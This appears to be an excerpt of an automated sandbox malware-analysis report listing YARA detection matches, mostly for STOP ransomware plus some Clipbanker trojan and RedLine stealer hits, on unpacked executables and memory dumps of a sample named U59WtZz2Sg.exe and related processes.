Source: 9.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.2.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.0.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 14.0.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 14.2.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 14.2.mstsca.exe.ee0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 5.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 7.2.U59WtZz2Sg.exe.21a15a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.7.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.2.build3.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.2.build3.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.3.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.2.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.4.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 4.2.U59WtZz2Sg.exe.22815a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 16.2.U59WtZz2Sg.exe.22315a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.8.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.10.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.9.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 11.0.build3.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 11.0.build3.exe.b90000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.9.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 3.2.U59WtZz2Sg.exe.21e15a0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 6.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 6.0.U59WtZz2Sg.exe.400000.10.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.7.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 0.2.U59WtZz2Sg.exe.22215a0.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.0.U59WtZz2Sg.exe.400000.6.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.6.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 1.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 1.2.U59WtZz2Sg.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 5.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 5.0.U59WtZz2Sg.exe.400000.5.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 9.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 9.0.U59WtZz2Sg.exe.400000.8.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 17.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 17.0.U59WtZz2Sg.exe.400000.5.unpack, type: UNPACKEDPE Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000011.00000000.367371233.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.343989029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000007.00000002.350733876.0000000002105000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000005.00000000.317450025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.345862911.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000005.00000002.564528734.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000000.00000002.305141359.0000000002220000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000000.323219375.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000009.00000000.344652371.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects STOP ransomware Author: ditekSHen
Source: 00000006.00000000.324169163.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Ransomware_Stop_1e8d48ff Author: unknown
Source: 0000000B.00000000.345320617.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_f9f9e79d Author: unknown
Source: 0000000B.00000000.345320617.0000000000B91000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY Matched rule: Windows_Trojan_Clipbanker_787b130b Author: unknown
